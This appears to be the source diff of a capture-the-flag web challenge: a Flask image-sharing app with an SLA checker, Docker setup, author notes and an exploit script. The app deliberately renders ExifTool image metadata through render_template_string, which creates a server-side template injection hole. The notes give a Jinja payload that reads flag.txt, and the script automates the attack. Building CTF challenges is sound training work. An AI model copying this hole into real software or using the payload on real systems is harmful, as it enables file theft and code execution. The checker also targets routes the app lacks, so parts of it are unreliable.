Writes/records the current flag on the host. Your infra may separately
mount/copy it into the container; this class *also* verifies existence
inside the container during .check().
"""
self._make_logger()
try:
with open(self.flag_location, 'w') as f:
f.write(flag)
with open(self.history_location, 'a') as f:
f.write(flag + '\n')
self.logger.info(f"Flag '{flag}' written to {self.flag_location}")
return True
except Exception as e:
self.logger.error(f"Failed writing host flag: {e}")
return False
# --- Helpers ---
def _gen_username(self) -> str:
return "user_" + ''.join(random.choices(string.ascii_lowercase + string.digits, k=8))
def _gen_password(self) -> str:
return "Pw!" + ''.join(random.choices(string.ascii_letters + string.digits, k=10))
def _tiny_png_bytes(self) -> bytes:
"""
Generate a minimal valid PNG in-memory to trigger exiftool.
"""
img = Image.new("RGB", (2, 2), (123, 200, 50))
buf = io.BytesIO()
img.save(buf, format="PNG")
return buf.getvalue()
def _docker_exec(self, args: list[str], timeout: int = 10) -> subprocess.CompletedProcess:
"""
Run `docker exec` into the challenge container.
"""
return subprocess.run(
["docker", "exec", self.container_name] + args,
capture_output=True,
text=True,
timeout=timeout
)
# --- SLA core ---
def check(self) -> bool:
self._make_logger()
base_url = f"http://localhost:{self.port}"
s = requests.Session()
# 0) Liveness: login page should be reachable (no auth needed)
login_url = base_url + "/login"
self.logger.info(f"[1/7] Checking liveness at {login_url} ...")
try:
r = s.get(login_url, timeout=10)
assert r.status_code == 200, f"Login page HTTP {r.status_code}"
self.logger.info(" ✓ Login page reachable")
except Exception as e:
self.logger.error(f" ✗ Liveness check failed: {e}")
return False
# 1) Register a fresh user
self.logger.info("[2/7] Registering a fresh user ...")
username = self._gen_username()
password = self._gen_password()
try:
r = s.post(
base_url + "/register",
data={"username": username, "password": password},
allow_redirects=False,
timeout=10,
)
# Flask typically redirects to /login on success (302)
assert r.status_code in (200, 302, 303), f"Register HTTP {r.status_code}"
self.logger.info(f" ✓ Registered as {username}")
except Exception as e:
self.logger.error(f" ✗ Registration failed: {e}")
return False
# 2) Log in
self.logger.info("[3/7] Logging in ...")
try:
r = s.post(
base_url + "/login",
data={"username": username, "password": password},
allow_redirects=True,
timeout=10,
)
# Successful login should redirect or render index; ensure not bounced back to /login with "Invalid credentials"
assert r.status_code == 200, f"Login HTTP {r.status_code}"
assert "/login" not in r.url or "Invalid credentials" not in r.text
self.logger.info(" ✓ Logged in")
except Exception as e:
self.logger.error(f" ✗ Login failed: {e}")
return False
# 3) Create post with image upload (PNG) to trigger exiftool + DB write
self.logger.info("[4/7] Creating a post with image upload ...")
title = "SLA Post " + ''.join(random.choices(string.ascii_letters, k=6))
content = "hello_from_sla_checker"
png_bytes = self._tiny_png_bytes()
files = {
"image": ("probe.png", png_bytes, "image/png")
}
data = {"title": title, "content": content}
try:
r = s.post(base_url + "/create", files=files, data=data, allow_redirects=True, timeout=20)
assert r.status_code == 200, f"Create returned HTTP {r.status_code}"
self.logger.info(" ✓ Post created")
except Exception as e:
self.logger.error(f" ✗ Create post failed: {e}")
return False
# 4) Discover the newly created post id by scraping links like /post/<id> from index
self.logger.info("[5/7] Resolving new post id from index ...")
try:
r = s.get(base_url + "/", timeout=10)
assert r.status_code == 200, f"Index HTTP {r.status_code}"
# Find the most recent /post/<id> that likely corresponds to our post title
# First try to find blocks containing our title then pull an id:
post_id: Optional[int] = None
# Prefer links sitting near our title
title_blocks = [m.start() for m in re.finditer(re.escape(title), r.text)]
if title_blocks:
# Search backward/forward around the title occurrences for a /post/<num> link
for pos in title_blocks:
window = r.text[max(0, pos-1000):pos+1000]
m = re.search(r'/post/(\d+)', window)
if m:
post_id = int(m.group(1))
break
# Fallback: pick the first /post/<id> in the page
if post_id is None:
m = re.search(r'/post/(\d+)', r.text)
assert m, "No /post/<id> link found on index"
post_id = int(m.group(1))
self.logger.info(f" ✓ Resolved post id = {post_id}")
except Exception as e:
self.logger.error(f" ✗ Could not resolve post id: {e}")
return False
# 5) Visit the post page, confirm it renders and contains our title/content.
self.logger.info("[6/7] Visiting the post page ...")
try:
vp = s.get(base_url + f"/post/{post_id}", timeout=10)
assert vp.status_code == 200, f"Post page HTTP {vp.status_code}"
assert title in vp.text, "Post title not present on view page"
assert content in vp.text, "Post content not present on view page"
self.logger.info(" ✓ Post page renders with our content")
except Exception as e:
self.logger.error(f" ✗ View post failed: {e}")
return False
# 6) Locate the uploaded file link on the post page, then fetch the .meta file via /uploads/<file>.meta
self.logger.info("[7/7] Verifying ExifTool metadata persisted & accessible ...")
try:
# Find something like /uploads/<sha256>.png (or .jpg/.jpeg/.bmp)
m = re.search(r'/uploads/([A-Za-z0-9_.-]+\.(?:png|jpg|jpeg|bmp))', vp.text, flags=re.IGNORECASE)
assert m, "No uploaded image link found on post page"
image_name = m.group(1)
# The server stores metadata in a sibling file with .meta suffix; it is served by the same /uploads route.
meta_url = base_url + f"/uploads/{image_name}.meta"
mr = s.get(meta_url, timeout=10)
assert mr.status_code == 200, f"Meta file HTTP {mr.status_code}"
meta_text = mr.text.strip()
# Heuristic: expect at least one ExifTool-like marker
assert any(tag in meta_text for tag in self._exif_markers), "Meta file does not look like ExifTool output"
self.logger.info(" ✓ Exif metadata present and readable")
except Exception as e:
self.logger.error(f" ✗ Metadata verification failed: {e}")
return False
# 7) Flag existence in container (do not fail SLA if only host copy exists but container is missing—treat as warning or policy-driven)
try:
proc = self._docker_exec(["/bin/sh", "-lc", f"test -f {self.container_flag_path} && cat {self.container_flag_path} || echo __MISSING__"])
out = (proc.stdout or "").strip()
if "__MISSING__" in out or proc.returncode not in (0,):
self.logger.warning("⚠ Flag file missing inside container")
else:
self.logger.info(" ✓ Container flag present")
# Optional: compare with host flag if present
try:
with open(self.flag_location, "r") as f:
host_flag = f.read().strip()
if host_flag and host_flag == out:
self.logger.info(" ✓ Host and container flags match")
else:
self.logger.warning("⚠ Host/container flag mismatch (may be expected if rotated separately)")
except FileNotFoundError:
self.logger.warning("⚠ Host flag not found; skipping comparison")
except Exception as e:
# Non-fatal: you can tune this to fail the round if flag is mandatory.
self.logger.warning(f"Flag existence check encountered an issue: {e}")
self.logger.info("SLA check passed ✅")
return True
+30
View File
@@ -0,0 +1,30 @@
## CDN
db used: sqlite
flag.txt: GEMASTIK{random sha256 generated on app start}
### feature:
[authentication required with login and register, register default as "user" role]
1. upload image
### Vulns
#### vuln1: SSTI on image Date Created metadata, exiftool cant insert this, need to write the image's blob
example:
```bash
(base) jons@01-20-jonathanmarbun:/mnt/c/1Jonathan/CTFS/gawe/gms25/web2/exploit$ exiftool -overwrite_original -IPTC:DateCreated="{{7*7}}" image.png
Warning: Invalid date format (use YYYY:mm:dd) in IPTC:DateCreated (ValueConvInv)
Nothing to do.
```
payload to inject:
```{{lipsum.__builtins__['open']('flag.txt').read()}}```
when editing the Date Created metadata manually, somehow it has limit of 46 char (but we can expand that to make it more by deleting the content of another metadata) -> check ssti.png
it probably have different behavior on another image file or format
payload: check exploit/exp3.py
#### vuln2:
### Patching Rule?
- dont remove flag.txt/changes its content
- ensure image metadata generation still available
- ensure exiftool still used
+21
View File
@@ -0,0 +1,21 @@
FROM python:3.12-slim
ENV PYTHONDONTWRITEBYTECODE=1 \
PYTHONUNBUFFERED=1 \
PIP_NO_CACHE_DIR=1
WORKDIR /app
RUN apt-get update \
&& apt-get install -y --no-install-recommends libimage-exiftool-perl \
&& rm -rf /var/lib/apt/lists/*
COPY requirements.txt .
RUN pip install -r requirements.txt
COPY . /app
RUN chmod +x /app/entrypoint.sh \
&& mkdir -p /app/uploads && chmod 755 /app/uploads
EXPOSE 8000
ENTRYPOINT ["/bin/bash", "entrypoint.sh"]
+265
View File
@@ -0,0 +1,265 @@
import os
import re
import sqlite3
import hashlib
import secrets
import datetime
import subprocess
from pathlib import Path
from flask import *
from werkzeug.security import generate_password_hash, check_password_hash
from werkzeug.utils import secure_filename
APP_DIR = os.path.dirname(os.path.abspath(__file__))
DB_PATH = os.path.join(APP_DIR, "data.db")
UPLOAD_DIR = os.path.join(APP_DIR, "uploads")
FLAG_PATH = os.path.join(APP_DIR, "flag.txt")
ALLOWED_EXT = {"png", "jpg", "jpeg", "bmp"}
MAX_CONTENT_LENGTH = 8 * 1024 * 1024
app = Flask(__name__)
app.secret_key = os.environ.get("SECRET_KEY", secrets.token_hex(16))
app.config["MAX_CONTENT_LENGTH"] = MAX_CONTENT_LENGTH
app.config["UPLOAD_FOLDER"] = UPLOAD_DIR
def get_db():
db = getattr(g, "_db", None)
if db is None:
db = g._db = sqlite3.connect(DB_PATH, check_same_thread=False)
db.row_factory = sqlite3.Row
return db
@app.teardown_appcontext
def close_db(_exc):
db = getattr(g, "_db", None)
if db:
db.close()
def init_db():
Path(UPLOAD_DIR).mkdir(parents=True, exist_ok=True)
db = get_db()
db.executescript("""
CREATE TABLE IF NOT EXISTS users (
id INTEGER PRIMARY KEY AUTOINCREMENT,
username TEXT UNIQUE NOT NULL,
password_hash TEXT NOT NULL,
role TEXT NOT NULL DEFAULT 'user',
created_at TEXT NOT NULL
);
CREATE TABLE IF NOT EXISTS posts (
id INTEGER PRIMARY KEY AUTOINCREMENT,
user_id INTEGER NOT NULL,
title TEXT NOT NULL,
filename TEXT NOT NULL,
metadata TEXT,
created_at TEXT NOT NULL,
FOREIGN KEY(user_id) REFERENCES users(id)
);
""")
db.commit()
def _resolve_flag_file_path():
p = FLAG_PATH
if os.path.isdir(p):
p = os.path.join(p, "flag.txt")
os.makedirs(os.path.dirname(p), exist_ok=True)
return p
def generate_flag_at_boot():
path = _resolve_flag_file_path()
if not os.path.exists(path) or os.environ.get("RESEED_FLAG") == "1":
token = secrets.token_bytes(32)
sha = hashlib.sha256(token).hexdigest()
with open(path, "w", encoding="utf-8") as fh:
fh.write(f"GEMASTIK{{{sha}}}\n")
def current_user():
if "uid" not in session:
return None
db = get_db()
cur = db.execute("SELECT id, username, role FROM users WHERE id = ?", (session["uid"],))
return cur.fetchone()
def _is_within(child_path: str, parent_dir: str) -> bool:
child_real = os.path.realpath(child_path)
parent_real = os.path.realpath(parent_dir)
try:
return os.path.commonpath([child_real, parent_real]) == parent_real
except ValueError:
return False
def _exiftool_text(path_on_disk: str) -> str:
if not _is_within(path_on_disk, UPLOAD_DIR):
return "no-metadata"
try:
proc = subprocess.run(
["exiftool", "--", path_on_disk],
capture_output=True,
text=True,
timeout=5
)
if proc.returncode != 0:
return "no-metadata"
return proc.stdout if proc.stdout else "no-metadata"
except subprocess.TimeoutExpired:
return "exif_err: timeout"
except FileNotFoundError:
return "exif_err: exiftool not found"
except Exception as e:
return f"exif_err: {e}"
def allowed_file(fn: str) -> bool:
if "." not in fn:
return False
ext = fn.rsplit(".", 1)[-1].lower()
return ext in ALLOWED_EXT
def sha256_hex(data: bytes) -> str:
return hashlib.sha256(data).hexdigest()
@app.route("/register", methods=["GET", "POST"])
def register():
if request.method == "POST":
username = request.form.get("username", "").strip()
password = request.form.get("password", "")
if not username or not password:
flash("Username and password required")
return render_template("register.html")
pw_hash = generate_password_hash(password)
try:
db = get_db()
db.execute(
"INSERT INTO users (username, password_hash, role, created_at) VALUES (?, ?, 'user', ?)",
(username, pw_hash, datetime.datetime.utcnow().isoformat() + "Z"),
)
db.commit()
except sqlite3.IntegrityError:
flash("Username already exists")
return render_template("register.html")
flash("Registered. Please login.")
return redirect(url_for("login"))
return render_template("register.html")
@app.route("/login", methods=["GET", "POST"])
def login():
if request.method == "POST":
username = request.form.get("username", "").strip()
password = request.form.get("password", "")
db = get_db()
cur = db.execute(
"SELECT id, username, password_hash, role FROM users WHERE username = ?",
(username,),
)
row = cur.fetchone()
if not row or not check_password_hash(row["password_hash"], password):
flash("Invalid credentials")
return render_template("login.html")
session["uid"] = row["id"]
flash(f"Welcome, {row['username']}!")
return redirect(url_for("gallery"))
return render_template("login.html")
@app.route("/logout")
def logout():
session.clear()
flash("Logged out")
return redirect(url_for("login"))
@app.route("/upload", methods=["GET", "POST"])
def upload():
user = current_user()
if not user:
return redirect(url_for("login"))
if request.method == "POST":
title = request.form.get("title", "").strip() or "(untitled)"
f = request.files.get("image")
if not f or f.filename == "":
flash("Choose an image.")
return render_template("upload.html")
orig_name = secure_filename(f.filename)
if not allowed_file(orig_name):
flash("Unsupported file type.")
return render_template("upload.html")
ext = orig_name.rsplit(".", 1)[-1].lower()
data = f.read()
sha = sha256_hex(data)
stored = f"{sha}.{ext}"
path = Path(UPLOAD_DIR) / stored
if not path.exists():
path.write_bytes(data)
metadata_blob = _exiftool_text(str(path))
db = get_db()
db.execute(
"""
INSERT INTO posts (user_id, title, filename, metadata, created_at)
VALUES (?, ?, ?, ?, ?)
""",
(user["id"], title, stored, metadata_blob, datetime.datetime.utcnow().isoformat() + "Z"),
)
db.commit()
flash("Upload complete.")
return redirect(url_for("gallery"))
return render_template("upload.html")
@app.route("/")
@app.route("/gallery")
def gallery():
user = current_user()
db = get_db()
cur = db.execute(
"""
SELECT p.id, p.title, p.filename, p.created_at, u.username
FROM posts p JOIN users u ON p.user_id = u.id
ORDER BY p.id DESC
"""
)
posts = cur.fetchall()
return render_template("gallery.html", posts=posts, user=user)
@app.route("/post/<int:pid>")
def view_post(pid):
db = get_db()
cur = db.execute(
"SELECT p.*, u.username FROM posts p JOIN users u ON p.user_id = u.id WHERE p.id = ?",
(pid,),
)
post = cur.fetchone()
if not post:
abort(404)
if request.args.get("meta") == "1":
return Response((post["metadata"] or ""), mimetype="text/plain")
metadata_full = post["metadata"] or ""
md_map = {"File Name": "", "Date Created": ""}
for m in re.finditer(r"^\s*(File Name|Date Created)\s*:\s*(.*)$", metadata_full, flags=re.MULTILINE):
key = m.group(1)
val = m.group(2).strip()
md_map[key] = val
file_name_val = md_map["File Name"]
date_created_val = md_map["Date Created"]
metadata_snippet_html = f"<pre>File Name: {file_name_val}\nDate Created: {date_created_val}</pre>"
tpl_path = os.path.join(APP_DIR, "templates", "view_post.html")
with open(tpl_path, "r", encoding="utf-8") as fh:
tpl_src = fh.read()
placeholder = "{{ metadata_snippet or '' }}"
if placeholder not in tpl_src:
page_src = tpl_src + "\n" + metadata_snippet_html
else:
page_src = tpl_src.replace(placeholder, metadata_snippet_html)
return render_template_string(page_src, post=post)
@app.route("/i/<path:filename>")
def cdn_serve(filename):
return send_from_directory(UPLOAD_DIR, filename, as_attachment=False)
@app.errorhandler(413)
def too_large(_):
flash("File too large.")
return redirect(url_for("upload"))
if __name__ == "__main__":
with app.app_context():
init_db()
generate_flag_at_boot()
app.run(host="0.0.0.0", port=8000, debug=False)
+12
View File
@@ -0,0 +1,12 @@
version: "3.8"
services:
web:
build: .
ports:
- "4414:8000"
environment:
SECRET_KEY: "c75f1259a4c95bb31563405d488d7bf9c0eaf4d562fd13557624f8e18eb5cfff"
RESEED_FLAG: "1"
volumes:
- ./uploads:/app/uploads
restart: unless-stopped
+30
View File
@@ -0,0 +1,30 @@
#!/usr/bin/env bash
set -euo pipefail
mkdir -p /app/uploads
chmod 755 /app/uploads
python - <<'PY'
import os
import app as m
with m.app.app_context():
m.init_db()
m.generate_flag_at_boot()
print("DB & flag initialized.")
PY
FLAG_PATH="${FLAG_PATH:-/app/flag.txt}"
if [ -d "$FLAG_PATH" ]; then
if [ -f "$FLAG_PATH/flag.txt" ]; then
chown root:root "$FLAG_PATH/flag.txt" || true
chmod 444 "$FLAG_PATH/flag.txt" || true
fi
else
if [ -f "$FLAG_PATH" ]; then
chown root:root "$FLAG_PATH" || true
chmod 444 "$FLAG_PATH" || true
fi
fi
exec python app.py
+7
View File
@@ -0,0 +1,7 @@
# Convenience: reseed flag once without starting server
import hashlib, secrets, os
FLAG_PATH = os.path.join(os.path.dirname(__file__), "flag.txt")
sha = hashlib.sha256(secrets.token_bytes(32)).hexdigest()
with open(FLAG_PATH, "w", encoding="utf-8") as fh:
fh.write(f"GEMASTIK{{{sha}}}\n")
print("Flag reseeded:", open(FLAG_PATH).read().strip())
+4
View File
@@ -0,0 +1,4 @@
Flask==3.0.3
Werkzeug==3.0.3
Pillow==10.4.0
exifread==3.0.0
+20
View File
@@ -0,0 +1,20 @@
:root { --bg: #0b0d10; --fg: #e5e7eb; --muted:#9ca3af; --card:#111317; --accent:#60a5fa; --stroke:#1f2937; }
* { box-sizing: border-box; }
body { margin:0; font: 15px/1.5 system-ui, -apple-system, Segoe UI, Roboto, Arial, sans-serif; background: var(--bg); color: var(--fg); }
a { color: var(--accent); text-decoration: none; }
.topbar { display:flex; justify-content:space-between; align-items:center; padding:12px 16px; border-bottom:1px solid var(--stroke); background:#0e1116; }
.brand { font-weight:700; letter-spacing:.3px; }
.container { max-width: 980px; margin: 24px auto; padding: 0 16px; }
.flash > div { background:#1a2332; border:1px solid #22314a; padding:8px 12px; margin:12px 0; border-radius:8px; }
label { display:block; margin:12px 0 6px; color: var(--muted); }
input, textarea { width:100%; padding:10px 12px; border-radius:8px; border:1px solid var(--stroke); background:#0f1217; color:var(--fg); }
button { margin-top:12px; padding:10px 16px; border-radius:8px; border:1px solid #2b3344; background:#1b2333; color:#dbeafe; cursor:pointer; }
.grid { display:grid; grid-template-columns: repeat(auto-fill, minmax(220px,1fr)); gap:16px; }
.card { display:block; border:1px solid var(--stroke); border-radius:12px; overflow:hidden; background: var(--card); }
.card img { width:100%; height:160px; object-fit:cover; display:block; }
.card .meta { padding:10px 12px; }
.card .title { font-weight:600; }
.card .sub { color: var(--muted); font-size: 12px; margin-top:4px; }
.post .full { width:100%; max-height:65vh; object-fit:contain; border:1px solid var(--stroke); border-radius:12px; }
details.desc { margin-top:12px; }
.foot { border-top:1px solid var(--stroke); color:var(--muted); padding:16px; text-align:center; margin-top:40px; }
+36
View File
@@ -0,0 +1,36 @@
<!doctype html>
<html>
<head>
<meta charset="utf-8" />
<title>pix.cdn — demo</title>
<link rel="stylesheet" href="{{ url_for('static', filename='style.css') }}" />
</head>
<body>
<header class="topbar">
<a href="{{ url_for('gallery') }}" class="brand">pix.cdn</a>
<nav>
{% if session.get('uid') %}
<a href="{{ url_for('upload') }}">Upload</a>
<a href="{{ url_for('logout') }}">Logout</a>
{% else %}
<a href="{{ url_for('login') }}">Login</a>
<a href="{{ url_for('register') }}">Register</a>
{% endif %}
</nav>
</header>
{% with msgs = get_flashed_messages() %}
{% if msgs %}
<div class="flash">
{% for m in msgs %}<div>{{ m }}</div>{% endfor %}
</div>
{% endif %}
{% endwith %}
<main class="container">
{% block content %}{% endblock %}
</main>
<footer class="foot">© pix.cdn</footer>
</body>
</html>
+20
View File
@@ -0,0 +1,20 @@
{% extends "base.html" %}
{% block content %}
<h2>Gallery</h2>
{% if not posts %}
<p>No posts yet. <a href="{{ url_for('upload') }}">Upload one</a>.</p>
{% endif %}
<div class="grid">
{% for p in posts %}
<a class="card" href="{{ url_for('view_post', pid=p.id) }}">
<img src="{{ url_for('cdn_serve', filename=p.filename) }}" alt="thumb" />
<div class="meta">
<div class="title">{{ p.title }}</div>
<div class="sub">{{ p.username }} · {{ p.created_at }}</div>
</div>
</a>
{% endfor %}
</div>
{% endblock %}
+11
View File
@@ -0,0 +1,11 @@
{% extends "base.html" %}
{% block content %}
<h2>Login</h2>
<form method="post">
<label>Username</label>
<input name="username" required />
<label>Password</label>
<input name="password" type="password" required />
<button type="submit">Login</button>
</form>
{% endblock %}
@@ -0,0 +1,12 @@
{% extends "base.html" %}
{% block content %}
<h2>Register</h2>
<form method="post">
<label>Username</label>
<input name="username" required />
<label>Password</label>
<input name="password" type="password" required />
<button type="submit">Create account</button>
</form>
<p class="hint">New users default to role <code>user</code>.</p>
{% endblock %}
+13
View File
@@ -0,0 +1,13 @@
{% extends "base.html" %}
{% block content %}
<h2>Upload image</h2>
<form method="post" enctype="multipart/form-data">
<label>Title</label>
<input name="title" placeholder="My picture" />
<label>Image file (png/jpg/jpeg/bmp)</label>
<input type="file" name="image" accept=".png,.jpg,.jpeg,.bmp" required />
<label>Notes (optional, saved with metadata)</label>
<textarea name="notes" rows="4" placeholder="CDN descriptors, tags, etc."></textarea>
<button type="submit">Upload</button>
</form>
{% endblock %}
@@ -0,0 +1,14 @@
{% extends "base.html" %}
{% block content %}
<article class="post">
<h2>{{ post.title }}</h2>
<img class="full" src="{{ url_for('cdn_serve', filename=post.filename) }}" alt="" />
<details class="desc">
<summary>Delivery details</summary>
<p>Static CDN reference: <code>/i/{{ post.filename }}</code></p>
<p>Uploaded at: <code>{{ post.created_at }}</code></p>
</details>
<template id="internal-meta" hidden>{{ metadata_snippet or '' }}</template>
</article>
{% endblock %}
Binary file not shown.

After

Width:  |  Height:  |  Size: 1012 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1012 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1012 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1012 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1012 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1012 KiB

BIN
View File
Binary file not shown.
+91
View File
@@ -0,0 +1,91 @@
import os
import re
import random
import string
from pathlib import Path
import requests
print("SSTI (Vuln) Exploit — fixed HOST env, redirects, timeouts")
HOST = "http://localhost:4414"
REGISTER_URL = f"{HOST}/register"
LOGIN_URL = f"{HOST}/login"
UPLOAD_URL = f"{HOST}/upload"
HOME_URL = f"{HOST}/"
TIMEOUT = float(os.environ.get("TIMEOUT", "1")) # detik
def rnd(n=8):
alpha = string.ascii_lowercase + string.digits
return ''.join(random.choices(alpha, k=n))
USERNAME = rnd()
PASSWORD = rnd()
LOCAL_IMAGE = os.environ.get("IMG", "ssti.png") # PNG dengan payload Jinja di metadata
s = requests.Session()
s.headers.update({"User-Agent": "ssti-exp/1.0"})
def ok_or_redirect(resp):
return 200 <= resp.status_code < 400
# 1) Register (allow redirects)
r = s.post(REGISTER_URL, data={"username": USERNAME, "password": PASSWORD},
allow_redirects=True, timeout=TIMEOUT)
print(f"[i] Register -> {r.status_code} | redirected={bool(r.history)}")
if not ok_or_redirect(r):
print("[x] Registration failed")
raise SystemExit(1)
print(f"[+] Registered: {USERNAME}:{PASSWORD}")
# 2) Login (allow redirects)
r = s.post(LOGIN_URL, data={"username": USERNAME, "password": PASSWORD},
allow_redirects=True, timeout=TIMEOUT)
print(f"[i] Login -> {r.status_code} | redirected={bool(r.history)}")
if not ok_or_redirect(r):
print("[x] Login failed")
raise SystemExit(1)
print("[+] Logged in")
# 3) Upload image (title + image)
img_path = Path(LOCAL_IMAGE)
if not img_path.exists():
raise SystemExit(f"[x] Local image not found: {LOCAL_IMAGE}")
with img_path.open("rb") as fh:
files = {"image": (img_path.name, fh, "image/png")}
data = {"title": "SSTI Exploit"}
r = s.post(UPLOAD_URL, data=data, files=files,
allow_redirects=True, timeout=TIMEOUT)
print(f"[i] Upload -> {r.status_code} | redirected={bool(r.history)}")
if not ok_or_redirect(r):
print("[x] Upload failed")
raise SystemExit(1)
print("[+] Upload complete")
# 4) Home → cari post id terbaru
r = s.get(HOME_URL, timeout=TIMEOUT)
print(f"[i] Home -> {r.status_code}")
if r.status_code != 200:
print("[x] Failed to load home")
raise SystemExit(1)
post_ids = re.findall(r'/post/(\d+)', r.text)
if not post_ids:
print("[-] No posts found on home.")
# print(r.text[:800])
raise SystemExit(1)
pid = max(map(int, post_ids))
post_url = f"{HOST}/post/{pid}"
print(f"[+] Newest post: {post_url}")
# 5) Trigger SSTI dan cari flag
r = s.get(post_url, timeout=TIMEOUT)
print(f"[i] Post -> {r.status_code}")
m = re.search(r"GEMASTIK\{[^}]*\}", r.text)
if m:
print("[+] Flag:", m.group(0))
else:
print("[-] Flag not found in response.")
print(r.text[:1200])
Binary file not shown.

After

Width:  |  Height:  |  Size: 1012 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1012 KiB